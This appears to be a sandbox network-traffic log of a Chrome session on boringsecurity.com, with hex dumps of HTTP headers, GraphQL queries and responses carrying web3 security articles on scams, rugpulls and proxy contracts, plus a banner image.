                                                                          2023-12-10 16:44:54 UTC1028INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 36 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74
                                                                          Data Ascii: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:45:00 GMTContent-Type: application/jsonContent-Length: 1261Connection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: t
                                                                          2023-12-10 16:44:54 UTC1261INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 61 74 65 67 6f 72 69 65 73 22 3a 7b 22 64 61 74 61 22 3a 5b 7b 22 69 64 22 3a 22 32 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6e 61 6d 65 22 3a 22 53 63 61 6d 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 6f 6d 65 74 68 69 6e 67 20 61 62 6f 75 74 20 53 63 61 6d 73 22 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 61 74 65 67 6f 72 79 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 61 74 65 67 6f 72 79 45 6e 74 69 74 79 22 7d 2c 7b 22 69 64 22 3a 22 33 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6e 61 6d 65 22 3a 22 57 61 6c 6c 65 74 20 53 65 63 75 72 69 74 79 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 6f 6d 65 74 68 69 6e 67 20 61 62 6f
                                                                          Data Ascii: {"data":{"categories":{"data":[{"id":"2","attributes":{"name":"Scams","description":"Something about Scams","locale":"en","__typename":"Category"},"__typename":"CategoryEntity"},{"id":"3","attributes":{"name":"Wallet Security","description":"Something abo


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          130192.168.2.54986323.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:54 UTC618OUTPOST /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 1743
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          accept: */*
                                                                          content-type: application/json
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:54 UTC1743OUTData Raw: 7b 22 6f 70 65 72 61 74 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 74 41 72 74 69 63 6c 65 73 22 2c 22 76 61 72 69 61 62 6c 65 73 22 3a 7b 22 70 61 67 65 22 3a 31 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 70 61 67 65 53 69 7a 65 22 3a 36 2c 22 73 6f 72 74 22 3a 5b 22 63 72 65 61 74 65 64 41 74 3a 64 65 73 63 22 5d 7d 2c 22 71 75 65 72 79 22 3a 22 71 75 65 72 79 20 47 65 74 41 72 74 69 63 6c 65 73 28 24 70 61 67 65 3a 20 49 6e 74 2c 20 24 70 61 67 65 53 69 7a 65 3a 20 49 6e 74 2c 20 24 63 61 74 65 67 6f 72 79 3a 20 49 44 2c 20 24 73 6f 72 74 3a 20 5b 53 74 72 69 6e 67 5d 2c 20 24 6c 6f 63 61 6c 65 3a 20 49 31 38 4e 4c 6f 63 61 6c 65 43 6f 64 65 29 20 7b 5c 6e 20 20 61 72 74 69 63 6c 65 73 28 5c 6e 20 20 20 20 73 6f 72 74 3a 20 24 73 6f 72 74 5c 6e 20 20 20
                                                                          Data Ascii: {"operationName":"GetArticles","variables":{"page":1,"locale":"en","pageSize":6,"sort":["createdAt:desc"]},"query":"query GetArticles($page: Int, $pageSize: Int, $category: ID, $sort: [String], $locale: I18NLocaleCode) {\n articles(\n sort: $sort\n
                                                                          2023-12-10 16:44:54 UTC1030INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 31 30 39 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a
                                                                          Data Ascii: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:45:00 GMTContent-Type: application/jsonContent-Length: 141093Connection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials:
                                                                          2023-12-10 16:44:54 UTC15354INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 61 72 74 69 63 6c 65 73 22 3a 7b 22 6d 65 74 61 22 3a 7b 22 70 61 67 69 6e 61 74 69 6f 6e 22 3a 7b 22 74 6f 74 61 6c 22 3a 32 32 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 50 61 67 69 6e 61 74 69 6f 6e 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 52 65 73 70 6f 6e 73 65 43 6f 6c 6c 65 63 74 69 6f 6e 4d 65 74 61 22 7d 2c 22 64 61 74 61 22 3a 5b 7b 22 69 64 22 3a 22 39 35 22 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 74 69 74 6c 65 22 3a 22 55 6e 64 65 72 73 74 61 6e 64 69 6e 67 20 49 6e 74 65 72 6e 61 6c 20 54 72 61 6e 73 61 63 74 69 6f 6e 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 6f 73 74 20 73 6b 69 70 20 74 68 65 20 49 6e 74 65 72 6e 61 6c 20 54 72 61 6e 73 61 63 74 69 6f 6e 73 20 74 61 62 20 69
                                                                          Data Ascii: {"data":{"articles":{"meta":{"pagination":{"total":22,"__typename":"Pagination"},"__typename":"ResponseCollectionMeta"},"data":[{"id":"95","attributes":{"title":"Understanding Internal Transactions","description":"Most skip the Internal Transactions tab i
                                                                          2023-12-10 16:44:54 UTC16384INData Raw: 74 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 5c 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 70 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 35 35 2c 32 35 35 2c 32 35 35 29 3b 63 6f 6c 6f 72 3a 72 67 62 28 35 35 2c 36 35 2c 38 31 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 26 71 75 6f 74 3b 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 26 71 75 6f 74 3b 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 5c 22 3e 3c 69 3e 48 61 76 65 20 61 6e 79 20 71 75 65 73 74 69 6f 6e 73 20 6f 72 20 77 61 6e 74 20 74 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 77 65 62 33 20 73 65 63 75
                                                                          Data Ascii: t;color:#000000;font-family:Arial,sans-serif;\">&nbsp;</span></li></ul><p><span style=\"background-color:rgb(255,255,255);color:rgb(55,65,81);font-family:&quot;Helvetica Neue&quot;, sans-serif;\"><i>Have any questions or want to learn more about web3 secu
                                                                          2023-12-10 16:44:54 UTC16384INData Raw: 69 6e 63 69 70 6c 65 20 6f 66 20 4c 65 61 73 74 20 50 72 69 76 69 6c 65 67 65 20 69 6e 20 50 72 61 63 74 69 63 65 3c 2f 68 32 3e 3c 68 33 20 73 74 79 6c 65 3d 5c 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 5c 22 3e 52 65 73 74 72 69 63 74 20 44 61 6e 67 65 72 6f 75 73 20 50 65 72 6d 69 73 73 69 6f 6e 73 3c 2f 68 33 3e 3c 70 20 73 74 79 6c 65 3d 5c 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 5c 22 3e 53 63 61 6d 6d 65 72 73 20 61 69 6d 20 74 6f 20 73 70 72 65 61 64 20 70 68 69 73 68 69 6e 67 20 6c 69 6e 6b 73 20 71 75 69 63 6b 6c 79 2c 20 6f 66 74 65 6e 20 62 79 20 63 6f 6d 70 72 6f 6d 69 73 69 6e 67 20 75 73 65 72 20 61 63 63 6f 75 6e 74 73 20 77 69 74 68 69 6e 20 79 6f 75 72 20 73 65 72 76 65 72 2e 20 54 6f 20 70 72 6f 74 65 63 74 20 61 67
                                                                          Data Ascii: inciple of Least Privilege in Practice</h2><h3 style=\"margin-left:0px;\">Restrict Dangerous Permissions</h3><p style=\"margin-left:0px;\">Scammers aim to spread phishing links quickly, often by compromising user accounts within your server. To protect ag
                                                                          2023-12-10 16:44:54 UTC16384INData Raw: 73 20 61 6e 64 20 74 68 65 6e 20 73 75 64 64 65 6e 6c 79 20 64 69 73 63 6f 6e 74 69 6e 75 69 6e 67 20 74 68 65 20 70 72 6f 6a 65 63 74 2c 20 72 65 6e 64 65 72 69 6e 67 20 74 68 65 20 4e 46 54 73 20 65 73 73 65 6e 74 69 61 6c 6c 79 20 77 6f 72 74 68 6c 65 73 73 2e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 70 20 73 74 79 6c 65 3d 5c 22 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 3b 5c 22 3e 3c 62 72 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 5c 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 3b 5c 22 3e 3c 73 74 72 6f 6e 67 3e 3c 75 3e 54 59 50 45 53 20 4f 46 20 52 55 47 50 55 4c 4c 53 3c 2f 75 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 70 20 73 74 79 6c 65 3d 5c 22 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 3b 5c 22
                                                                          Data Ascii: s and then suddenly discontinuing the project, rendering the NFTs essentially worthless.</span></p><p style=\"text-align:justify;\"><br><span style=\"font-family:Arial;\"><strong><u>TYPES OF RUGPULLS</u></strong></span></p><p style=\"text-align:justify;\"
                                                                          2023-12-10 16:44:54 UTC16384INData Raw: 65 78 70 65 63 74 65 64 20 74 72 61 6e 73 66 65 72 73 2e 20 59 6f 75 20 63 61 6e 20 64 6f 20 73 6f 20 74 68 72 6f 75 67 68 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 6f 6c 20 73 74 79 6c 65 3d 5c 22 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 64 65 63 69 6d 61 6c 3b 5c 22 3e 3c 6c 69 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 5c 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 3b 5c 22 3e 3c 73 74 72 6f 6e 67 3e 49 64 65 6e 74 69 66 79 20 74 68 65 20 4e 46 54 20 6f 6e 20 61 20 74 72 75 73 74 65 64 20 6d 61 72 6b 65 74 70 6c 61 63 65 2e 26 6e 62 73 70 3b 3c 2f 73 74 72 6f 6e 67 3e 42 61 73 69 63 20 64 65 74 61 69 6c 73 20 73 75 63 68 20 61 73 20 63 75 72 72 65 6e 74 20 61 6e 64 20 70 72 65 76 69 6f 75 73 20 68 6f
                                                                          Data Ascii: expected transfers. You can do so through the following:</span></p><ol style=\"list-style-type:decimal;\"><li><span style=\"font-family:Arial;\"><strong>Identify the NFT on a trusted marketplace.&nbsp;</strong>Basic details such as current and previous ho
                                                                          2023-12-10 16:44:54 UTC16384INData Raw: 67 3e 55 70 67 72 61 64 61 62 69 6c 69 74 79 3a 3c 2f 73 74 72 6f 6e 67 3e 20 54 68 69 73 20 69 73 20 74 68 65 20 70 72 69 6d 61 72 79 20 72 65 61 73 6f 6e 2e 20 54 68 65 20 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 20 63 6f 6e 74 72 61 63 74 20 63 61 6e 20 62 65 20 75 70 67 72 61 64 65 64 20 77 69 74 68 6f 75 74 20 61 66 66 65 63 74 69 6e 67 20 74 68 65 20 70 72 6f 78 79 20 63 6f 6e 74 72 61 63 74 20 6f 72 20 75 73 65 72 73 2e 20 50 72 6f 6a 65 63 74 73 20 64 6f 6e e2 80 99 74 20 77 61 6e 74 20 74 6f 20 6c 6f 73 65 20 75 73 65 72 73 20 62 79 20 72 65 71 75 69 72 69 6e 67 26 6e 62 73 70 3b 20 74 68 65 6d 20 74 6f 20 72 65 2d 61 70 70 72 6f 76 65 20 61 6c 72 65 61 64 79 20 65 78 69 73 74 69 6e 67 20 61 73 73 65 74 73 2c 20 6d 69 67 72 61 74 65 20 66 75 6e
                                                                          Data Ascii: g>Upgradability:</strong> This is the primary reason. The implementation contract can be upgraded without affecting the proxy contract or users. Projects dont want to lose users by requiring&nbsp; them to re-approve already existing assets, migrate fun
                                                                          2023-12-10 16:44:54 UTC16384INData Raw: 73 63 6f 72 64 2e 67 67 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 3c 2f 75 3e 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 63 6f 6c 6f 72 3a 23 33 37 34 31 35 31 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 5c 22 3e 3c 69 3e 20 2e 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 22 2c 22 72 65 61 64 69 6e 67 54 69 6d 65 22 3a 22 38 20 6d 69 6e 75 74 65 73 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 31 33 54 30 31 3a 30 36 3a 30 37 2e 33 32 36 5a 22 2c 22 73 6c 75 67 22 3a 22 61 6c 6c 2d 61 62 6f 75 74 2d 70 72 6f 78 79 2d 63 6f 6e 74 72 61 63 74 73 22 2c 22 6c 6f 63 61 6c
                                                                          Data Ascii: scord.gg/boringsecurity</u></i></span></a><span style=\"background-color:#ffffff;color:#374151;font-family:Arial,sans-serif;\"><i> .</i></span></p>","readingTime":"8 minutes","createdAt":"2023-06-13T01:06:07.326Z","slug":"all-about-proxy-contracts","local
                                                                          2023-12-10 16:44:54 UTC16384INData Raw: 69 64 65 20 6f 66 20 62 65 69 6e 67 20 63 61 72 65 66 75 6c 20 61 62 6f 75 74 20 77 68 61 74 20 79 6f 75 20 73 69 67 6e 2c 20 79 6f 75 20 73 68 6f 75 6c 64 20 61 6c 73 6f 20 70 72 61 63 74 69 63 65 20 67 6f 6f 64 20 3c 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 65 64 67 65 72 2e 63 6f 6d 2f 61 63 61 64 65 6d 79 2f 73 65 67 72 65 67 61 74 65 2d 63 72 79 70 74 6f 2d 61 73 73 65 74 73 5c 22 3e 3c 75 3e 61 73 73 65 74 20 73 65 67 72 65 67 61 74 69 6f 6e 3c 2f 75 3e 3c 2f 61 3e 2e 20 53 69 6e 63 65 20 6f 6e 6c 79 20 74 68 65 20 4e 46 54 73 20 79 6f 75 e2 80 99 76 65 20 61 70 70 72 6f 76 65 64 20 74 6f 20 4f 70 65 6e 53 65 61 20 6f 72 20 6f 74 68 65 72 20 6d 61 72 6b 65 74 70 6c 61 63 65 73 20 61 72 65 20 76 75 6c 6e 65 72 61 62 6c 65 20
                                                                          Data Ascii: ide of being careful about what you sign, you should also practice good <a href=\"https://www.ledger.com/academy/segregate-crypto-assets\"><u>asset segregation</u></a>. Since only the NFTs youve approved to OpenSea or other marketplaces are vulnerable


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          131192.168.2.54986575.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:54 UTC520OUTGET /parseGridNftDataToCanvas.worker.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: worker
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "0922e34df9afec7660bfdaeb43061ea3-ssl"
                                                                          2023-12-10 16:44:54 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 34 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 39 32 32 65 33 34 64 66 39 61 66 65 63 37 36 36 30 62 66 64 61 65 62 34 33 30 36 31 65 61 33 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:44:54 GMTEtag: "0922e34df9afec7660bfdaeb43061ea3-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          132192.168.2.54986623.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:54 UTC354OUTGET /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:54 UTC985INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 3b 69 6d 67 2d 73 72 63 20 27 73 65 6c 66 27 20 64 61 74 61 3a 20 63 64 6e 2e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:45:00 GMTContent-Type: text/plain; charset=utf-8Content-Length: 18Connection: closeVary: OriginContent-Security-Policy: connect-src 'self' https:;img-src 'self' data: cdn.
                                                                          2023-12-10 16:44:54 UTC18INGET query missing.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          133192.168.2.54986775.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:54 UTC422OUTGET /_ipx/w_2048,q_75/%2Fimages%2Fbanner.jpeg?url=%2Fimages%2Fbanner.jpeg&w=2048&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:54 UTC412INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 33 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 32 34 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 34 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 33 38 62 65 39 2d 66
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 3Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 232425Content-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:44:54 GMTEtag: "38be9-f
                                                                          2023-12-10 16:44:54 UTC774INData Raw: ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 03 5b 07 ff 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff c4 00 19 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 f1 a4 96 7a 26 a4 10 b2 b0 18 04 9a c4 9b 2b 72 72 c1 b6 41 4d 09 d8 e5 a9 58
                                                                          Data Ascii: C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222["z&+rrAMX
                                                                          2023-12-10 16:44:54 UTC2372INData Raw: 4e 2e c6 d3 95 c6 51 48 c2 ca e9 c6 51 06 a4 21 a0 00 49 82 18 92 6c 54 30 83 4c 01 90 53 82 45 85 09 90 01 40 08 46 48 bd 8f 3b 52 41 2a ad ad 44 c4 18 d4 63 06 39 54 64 10 60 6b 83 8e 77 5a 91 ac a2 4a 22 35 60 a4 a9 42 70 41 a9 90 8c e2 4a 32 00 01 27 10 8c e0 97 4a 32 18 12 80 0c 19 06 d9 4c e3 3b 24 d3 94 00 00 0a ad a8 90 16 46 bb 62 16 58 da a6 bd 75 25 20 00 21 0c 22 31 2c 69 80 00 9a 14 27 10 60 34 c2 bb 6b 98 c6 00 a2 48 ae 49 30 6b 19 37 11 a3 5d 02 8c e1 6a 9c 2c 44 31 50 c1 29 21 35 24 b0 6a 51 81 11 a0 1a 1a 0a 33 e9 cc 8d 82 d7 25 24 18 28 0c 01 89 a6 5a a4 a1 36 50 c7 09 4a 34 da 70 b1 ec c7 57 a6 02 60 26 08 00 60 69 02 5c ee 36 24 46 09 a0 01 8a ab 6a b1 8c 21 65 76 00 c5 18 00 32 23 11 35 22 86 30 01 48 ce 04 67 09 d8 0e 32 b5 24 4e 32
                                                                          Data Ascii: N.QHQ!IlT0LSE@FH;RA*Dc9Td`kwZJ"5`BpAJ2'J2L;$FbXu% !"1,i'`4kHI0k7]j,D1P)!5$jQ3%$(Z6PJ4pW`&`i\6$Fj!ev2#5"0Hg2$N2
